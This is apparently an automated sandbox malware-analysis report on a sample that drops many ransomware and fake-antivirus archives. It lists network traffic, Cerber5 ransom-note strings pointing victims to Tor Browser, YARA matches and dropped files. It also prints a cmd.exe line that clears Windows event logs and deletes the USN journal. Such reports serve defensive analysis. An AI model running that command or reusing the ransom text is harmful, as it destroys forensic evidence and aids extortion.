          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1595Date: Thu, 29 Sep 2022 13:02:08 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1595Date: Thu, 29 Sep 2022 13:02:18 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
          Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
          Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
          Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
          Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
          Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
          Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
          Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
          Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
          Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
          Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
          Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
          Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
          Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
          Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
          Source: unknownTCP traffic detected without corresponding DNS query: 23.50.105.163
          Source: unknownTCP traffic detected without corresponding DNS query: 23.50.105.163
          Source: unknownTCP traffic detected without corresponding DNS query: 23.50.105.163
          Source: unknownTCP traffic detected without corresponding DNS query: 23.50.105.163
          Source: unknownTCP traffic detected without corresponding DNS query: 23.50.105.163
          Source: unknownTCP traffic detected without corresponding DNS query: 23.50.105.163
          Source: unknownTCP traffic detected without corresponding DNS query: 23.50.105.163
          Source: unknownTCP traffic detected without corresponding DNS query: 23.50.105.163
          Source: unknownTCP traffic detected without corresponding DNS query: 23.50.105.163
          Source: unknownTCP traffic detected without corresponding DNS query: 23.50.105.163
          Source: unknownTCP traffic detected without corresponding DNS query: 23.50.105.163
          Source: unknownTCP traffic detected without corresponding DNS query: 23.50.105.163
          Source: unknownTCP traffic detected without corresponding DNS query: 23.50.105.163
          Source: unknownTCP traffic detected without corresponding DNS query: 23.50.105.163
          Source: unknownTCP traffic detected without corresponding DNS query: 23.50.105.163
          Source: unknownTCP traffic detected without corresponding DNS query: 23.50.105.163
          Source: unknownTCP traffic detected without corresponding DNS query: 23.50.105.163
          Source: unknownTCP traffic detected without corresponding DNS query: 23.50.106.206
          Source: unknownTCP traffic detected without corresponding DNS query: 23.50.106.206
          Source: unknownTCP traffic detected without corresponding DNS query: 23.50.106.206
          Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.200
          Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.200
          Source: unknownTCP traffic detected without corresponding DNS query: 93.184.220.29
          Source: unknownTCP traffic detected without corresponding DNS query: 95.140.236.128
          Source: unknownTCP traffic detected without corresponding DNS query: 95.140.236.128
          Source: unknownTCP traffic detected without corresponding DNS query: 95.140.236.128
          Source: unknownTCP traffic detected without corresponding DNS query: 41.63.96.0
          Source: unknownTCP traffic detected without corresponding DNS query: 41.63.96.0
          Source: unknownTCP traffic detected without corresponding DNS query: 93.184.220.29
          Source: unknownTCP traffic detected without corresponding DNS query: 8.238.190.126
          Source: unknownTCP traffic detected without corresponding DNS query: 23.35.237.194
          Source: unknownTCP traffic detected without corresponding DNS query: 95.140.236.128
          Source: unknownTCP traffic detected without corresponding DNS query: 93.184.220.29
          Source: unknownTCP traffic detected without corresponding DNS query: 93.184.220.29
          Source: unknownTCP traffic detected without corresponding DNS query: 8.238.190.126
          Source: unknownTCP traffic detected without corresponding DNS query: 8.238.190.126
          Source: Endermanch@Cerber5.exe, 00000017.00000003.460533758.00000000050F5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <p>If you have any pr<span class="h">Xn</span>oblems during installation or use of Tor&nbsp;Browser, please, visit <a href="https://www.youtube.com/results?search_query=Install+Tor+Browser+Windows" target="_blank">https://www.youtube.com</a> and type request in the searc<span class="h">agdZ0pNyI</span>h bar "Install Tor&nbsp;Browser Windows" and you will find a lot of training videos about Tor&nbsp;Browser installation and use.</p> equals www.youtube.com (Youtube)
          Source: Endermanch@Cerber5.exe, 00000017.00000003.460533758.00000000050F5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <p>If you have any pr<span class="h">{RAND}</span>oblems during installation or use of Tor&nbsp;Browser, please, visit <a href="https://www.youtube.com/results?search_query=Install+Tor+Browser+Windows" target="_blank">https://www.youtube.com</a> and type request in the searc<span class="h">{RAND}</span>h bar "Install Tor&nbsp;Browser Windows" and you will find a lot of training videos about Tor&nbsp;Browser installation and use.</p> equals www.youtube.com (Youtube)
          Source: Endermanch@Cerber5.exe, 00000017.00000003.460533758.00000000050F5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <p>Indien uw problemen heeft tijdens de installatie of het gebruik van Tor&nbsp;Browser, ga dan naar <a href="https://www.youtube.com/results?search_query=Install+Tor+Browser+Windows" target="_blank">https://www.youtube.com</a> en typ in de zoekbalk equals www.youtube.com (Youtube)
          Source: Endermanch@Cerber5.exe, 00000017.00000003.460533758.00000000050F5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <p>Se si riscontrano problemi durante l'installazione o l'utilizzo di Tor&nbsp;Browser, visitare <a href="https://www.youtube.com/results?search_query=Install+Tor+Browser+Windows" target="_blank">https://www.youtube.com</a> e immettere "install tor browser windows" nella barra di ricerca per trovare numerosi video esplicativi sull'installazione e utilizzo di Tor&nbsp;Browser.</p> equals www.youtube.com (Youtube)
          Source: Endermanch@Cerber5.exe, 00000017.00000003.460533758.00000000050F5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <a href="https://www.youtube.com/results?search_query=Install+Tor+Browser+Windows" target="_blank">https://www.youtube.com</a> equals www.youtube.com (Youtube)
          Source: Endermanch@Cerber5.exe, 00000017.00000003.460533758.00000000050F5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: do portalu <a href="https://www.youtube.com/results?search_query=Install+Tor+Browser+Windows" target="_blank">https://www.youtube.com</a> i wpisz w wyszukiwarce equals www.youtube.com (Youtube)
          Source: Endermanch@Cerber5.exe, 00000017.00000003.460533758.00000000050F5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <a href="https://www.youtube.com/results?search_query=Install+Tor+Browser+Windows" target="_blank">https://www.youtube.com</a> equals www.youtube.com (Youtube)
          Source: Endermanch@Cerber5.exe, 00000017.00000003.460533758.00000000050F5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: hrend der Installation von Tor&nbsp;Browser Probleme haben, besuchen Sie bitte <a href="https://www.youtube.com/results?search_query=Install+Tor+Browser+Windows" target="_blank">https://www.youtube.com</a> und geben als Suchanforderung "tor browser Windows installieren" ein und Sie erhalten in den Suchergebnossen viele Anleitungsvideos equals www.youtube.com (Youtube)
          Source: Endermanch@Cerber5.exe, 00000017.00000003.460533758.00000000050F5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: n, o durante el uso del Navegador Tor, visite <a href="https://www.youtube.com/results?search_query=Install+Tor+Browser+Windows" target="_blank">https://www.youtube.com</a> y escriba la solicitud en la barra de b equals www.youtube.com (Youtube)
          Source: Endermanch@Cerber5.exe, 00000017.00000003.460533758.00000000050F5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: o do Tor&nbsp;Browser, visite <a href="https://www.youtube.com/results?search_query=Install+Tor+Browser+Windows" target="_blank">https://www.youtube.com</a> e insira o pedido na barra de pesquisa equals www.youtube.com (Youtube)
          Source: Endermanch@Cerber5.exe, 00000017.00000003.460533758.00000000050F5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: rken herhangi bir sorununuz olursa <a href="https://www.youtube.com/results?search_query=Install+Tor+Browser+Windows" target="_blank">https://www.youtube.com</a> adresine gidin ve arama equals www.youtube.com (Youtube)
          Source: Endermanch@Cerber5.exe, 00000017.00000003.460533758.00000000050F5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: utilisation de Tor&nbsp;Browser, veuillez visiter <a href="https://www.youtube.com/results?search_query=Install+Tor+Browser+Windows" target="_blank">https://www.youtube.com</a> et saisir la demande dans la barre de recherche equals www.youtube.com (Youtube)
          Source: unknownHTTP traffic detected: POST /threshold/xls.aspx HTTP/1.1Origin: https://www.bing.comReferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/InitX-PositionerType: DesktopX-Search-CortanaAvailableCapabilities: CortanaExperience,SpeechLanguageX-Search-SafeSearch: ModerateX-Device-MachineId: {A2AB526A-D38D-4FC9-8BA0-E34B8D6354E8}X-UserAgeClass: UnknownX-BM-Market: USX-BM-DateFormat: M/d/yyyyX-CortanaAccessAboveLock: falseX-Device-OSSKU: 48X-BM-DTZ: -420X-BM-FirstEnabledTime: 132061295966656129X-DeviceID: 0100748C09004E33X-BM-DeviceScale: 100X-Search-TimeZone: Bias=480; DaylightBias=-60; TimeZoneKeyName=Pacific Standard TimeX-BM-Theme: 000000;0078d7X-BM-DeviceDimensionsLogical: 1232x1024X-BM-DeviceDimensions: 1232x1024X-Search-RPSToken: t%3DEwDYAkR8BAAUcvamItSE/vUHpyZRp3BeyOJPQDsAAXwwSr16TwZxvghymg//XETj6Tm1HeWPPaa%2Bp3rbli/mvLOk/T6EkvQNUk399UzR3LIX4M/iQEWA7aQU%2BOfqpbEzl5FRxfViukt0nIOJC4GauVchsCLJf/OzsxoL8utB7g00/KCY%2BTs3oE5N9riluRal8eU6Lp1ZeKUF8E3dAd1WdY2OYkiMfIN6hKZymZE77pW/tUmE8J2cLrx40JkPjrOcc97Ka4s6MWsJQjAgG45Zgaw8ZAMII6%2Bh9%2BCunAdSjJkPBj6AG540X%2BB/1oCnPjGVdu/hkAggEmOTH%2BMrTonvu5uKb2W9CXRw6SSDX3iq2ZPiFJjju9%2BmNMHjpZf/rnwDZgAACPnVUJ8qmC%2B3qAHxPY%2BYLLGbXL3O%2BvyWnRNXbqpplR/SNfFS3pzS7lkShmCUmyiwax%2Bl4lLGzKvky6WQGfBUQsanWoOo38%2BGqTYOiSdJllW7r%2BTuLEeq6JUw33Lxr/TxnJ%2B58Zwuvn1wQ3WRGrQDwQyBIv//mDpGhB%2BEWVL2NAg0j0VsA2TI%2BaLgas6IJ64Xh%2BNzAw/K5ZBIt2wC5DtbafbNFDsyJu2IPWcuCXlodod0bXMQ4Vp%2BSeJxMnivHScTVa6g9gzPVuwrGWxLDLIyLX0PBk8Vtxf2iPg85vCv%2Ba6yIu9PMJpqJUzGVENLWVod%2B4tYQ2vWUJJaZDLN191JnF5s12cdic/XLMbHIjhyhX4QA0hkvf%2B2gret8Fsy/8VhtgtUQPskWn5Bk0vrmTVXVszRUs5230czaLlSQyKRH3GXkihUKMGnwj/U3vaTXVT/0xRBEwKjx95iiDkLVgrCdgH7PNRFII62usTlSZ6Bm9JbgyetkWyU2BsE4XvEr2NLqaCLUAhsj%2Bq32LZSv6VHIAmPz5JgFwgM4r7bzWT4ubL0GWqeXOX502lQL724mOtyICas1gE%3D%26p%3DX-Agent-DeviceId: 0100748C09004E33X-BM-CBT: 1660685844X-Device-isOptin: trueX-Device-Touch: falseX-Device-ClientSession: D8F6B43E3D444318ACE6FB571E033018X-Search-AppId: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUIX-BM-ClientFeatures: pbitcpdisabled,AmbientWidescreen,rs1musicprod,CortanaSPAXamlHeaderX-MSEdge-ExternalExpType: JointCoordX-MSEdge-ExternalExp: d-thshld39,d-thshld42,d-thshld77,d-thshld78,d-thshldspcl40Content-Type: text/plain;charset=UTF-8Accept: */*Accept-Language: en-USAccept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.10.7.17134; 10.0.0.0.17134.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134Host: www.bing.comContent-Length: 429Connection: Keep-AliveCache-Control: no-cacheCookie: MUID=1E17B9B70E9B4C6E957D159ED3646FFF; _SS=CPID=1664488707263&AC=1&CPH=4ef661f2; SRCHUID=V=2&GUID=CAFE605AAF964660B8479EEA5D4FD3FE&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20220929; SRCHHPGUSR=SRCHLANG=en; ANON=A=E6EAEF30D7E9C145923C068AFFFFFFFF; MUIDB=1E17B9B70E9B4C6E957D159ED3646FFF
          Source: unknownHTTPS traffic detected: 23.50.105.163:443 -> 192.168.2.3:49708 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.3:49710 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.3:49711 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.3:49818 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 40.126.32.136:443 -> 192.168.2.3:49820 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.3:49826 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.208.16.94:443 -> 192.168.2.3:49827 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.208.16.94:443 -> 192.168.2.3:49833 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 185.189.112.162:443 -> 192.168.2.3:49859 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 20.189.173.20:443 -> 192.168.2.3:49874 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 20.189.173.21:443 -> 192.168.2.3:49876 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 20.189.173.21:443 -> 192.168.2.3:49891 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.3:49892 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.3:49895 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 194.36.89.57:443 -> 192.168.2.3:49906 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 185.189.112.162:443 -> 192.168.2.3:49934 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 20.189.173.21:443 -> 192.168.2.3:49935 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.3:49939 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.3:49941 version: TLS 1.2
          Source: Endermanch@AntivirusPlatinum.exe, 0000000F.00000002.381084667.000000000065A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

          Spam, unwanted Advertisements and Ransom Demands

          barindex
          Source: Yara matchFile source: 30.0.Endermanch@DeriaLock.exe.870000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000001E.00000000.395625850.00000000008B6000.00000002.00000001.01000000.00000018.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: Endermanch@DeriaLock.exe PID: 2584, type: MEMORYSTR
          Source: Yara matchFile source: C:\Users\user\Desktop\Endermanch@DeriaLock.exe, type: DROPPED
          Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 4124, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: Endermanch@Cerber5.exe PID: 3128, type: MEMORYSTR
          Source: Yara matchFile source: 57.0.Endermanch@InfinityCrypt.exe.350000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 57.0.Endermanch@InfinityCrypt.exe.3531cc.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000039.00000000.449968322.0000000000363000.00000002.00000001.01000000.00000026.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000039.00000000.448929209.0000000000352000.00000002.00000001.01000000.00000026.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: Endermanch@InfinityCrypt.exe PID: 6444, type: MEMORYSTR
          Source: Yara matchFile source: C:\Users\user\Desktop\Endermanch@InfinityCrypt.exe, type: DROPPED
          Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c wevtutil cl Setup & wevtutil cl System & wevtutil cl Security & wevtutil cl Application & fsutil usn deletejournal /D C:
          Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c wevtutil cl Setup & wevtutil cl System & wevtutil cl Security & wevtutil cl Application & fsutil usn deletejournal /D C:
          Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c wevtutil cl Setup & wevtutil cl System & wevtutil cl Security & wevtutil cl Application & fsutil usn deletejournal /D C:
          Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c wevtutil cl Setup & wevtutil cl System & wevtutil cl Security & wevtutil cl Application & fsutil usn deletejournal /D C:
          Source: C:\Users\user\Desktop\07bb0738.exeFile created: C:\Users\user\Desktop\InfinityCrypt.zip entropy: 7.99452427176Jump to dropped file
          Source: C:\Users\user\Desktop\07bb0738.exeFile created: C:\Users\user\Desktop\Krotten.zip entropy: 7.99208020013Jump to dropped file
          Source: C:\Users\user\Desktop\07bb0738.exeFile created: C:\Users\user\Desktop\NoMoreRansom.zip entropy: 7.99977083573Jump to dropped file
          Source: C:\Users\user\Desktop\07bb0738.exeFile created: C:\Users\user\Desktop\Petya.A.zip entropy: 7.99868517199Jump to dropped file
          Source: C:\Users\user\Desktop\07bb0738.exeFile created: C:\Users\user\Desktop\PolyRansom.zip entropy: 7.99851934642Jump to dropped file
          Source: C:\Users\user\Desktop\07bb0738.exeFile created: C:\Users\user\Desktop\BadRabbit.zip entropy: 7.99954529182Jump to dropped file
          Source: C:\Users\user\Desktop\07bb0738.exeFile created: C:\Users\user\Desktop\Birele.zip entropy: 7.99844368873Jump to dropped file
          Source: C:\Users\user\Desktop\07bb0738.exeFile created: C:\Users\user\Desktop\Cerber 5.zip entropy: 7.99902439733Jump to dropped file
          Source: C:\Users\user\Desktop\07bb0738.exeFile created: C:\Users\user\Desktop\DeriaLock.zip entropy: 7.99908454042Jump to dropped file
          Source: C:\Users\user\Desktop\07bb0738.exeFile created: C:\Users\user\Desktop\Fantom.zip entropy: 7.99896513348Jump to dropped file
          Source: C:\Users\user\Desktop\07bb0738.exeFile created: C:\Users\user\Desktop\Winlocker.VB6.Blacksod.zip entropy: 7.99988062136Jump to dropped file
          Source: C:\Users\user\Desktop\07bb0738.exeFile created: C:\Users\user\Desktop\ViraLock.zip entropy: 7.99846482221Jump to dropped file
          Source: C:\Users\user\Desktop\07bb0738.exeFile created: C:\Users\user\Desktop\WannaCrypt0r.zip entropy: 7.99994536296Jump to dropped file
          Source: C:\Users\user\Desktop\07bb0738.exeFile created: C:\Users\user\Desktop\Endermanch@WannaCrypt0r.exe entropy: 7.99547094116Jump to dropped file
          Source: C:\Users\user\Desktop\07bb0738.exeFile created: C:\Users\user\Desktop\Xyeta.zip entropy: 7.99739345362Jump to dropped file
          Source: C:\Users\user\Desktop\07bb0738.exeFile created: C:\Users\user\Desktop\Antivirus.zip entropy: 7.99985428104Jump to dropped file
          Source: C:\Users\user\Desktop\07bb0738.exeFile created: C:\Users\user\Desktop\Antivirus Platinum.zip entropy: 7.99971875217Jump to dropped file
          Source: C:\Users\user\Desktop\07bb0738.exeFile created: C:\Users\user\Desktop\Antivirus Pro 2017.zip entropy: 7.99977078936Jump to dropped file
          Source: C:\Users\user\Desktop\07bb0738.exeFile created: C:\Users\user\Desktop\AnViPC2009.zip entropy: 7.99983383415Jump to dropped file
          Source: C:\Users\user\Desktop\07bb0738.exeFile created: C:\Users\user\Desktop\FakeAdwCleaner.zip entropy: 7.99895130237Jump to dropped file
          Source: C:\Users\user\Desktop\07bb0738.exeFile created: C:\Users\user\Desktop\Happy Antivirus.zip entropy: 7.99990323273Jump to dropped file
          Source: C:\Users\user\Desktop\07bb0738.exeFile created: C:\Users\user\Desktop\InternetSecurityGuard.zip entropy: 7.99993910287Jump to dropped file
          Source: C:\Users\user\Desktop\07bb0738.exeFile created: C:\Users\user\Desktop\Live Protection Suite 2019.zip entropy: 7.99979933838Jump to dropped file
          Source: C:\Users\user\Desktop\07bb0738.exeFile created: C:\Users\user\Desktop\Movie.mpeg.zip entropy: 7.99948436194Jump to dropped file
          Source: C:\Users\user\Desktop\07bb0738.exeFile created: C:\Users\user\Desktop\NavaShield.zip entropy: 7.99997673762Jump to dropped file
          Source: C:\Users\user\Desktop\07bb0738.exeFile created: C:\Users\user\Desktop\PC Defender.zip entropy: 7.99982667621Jump to dropped file
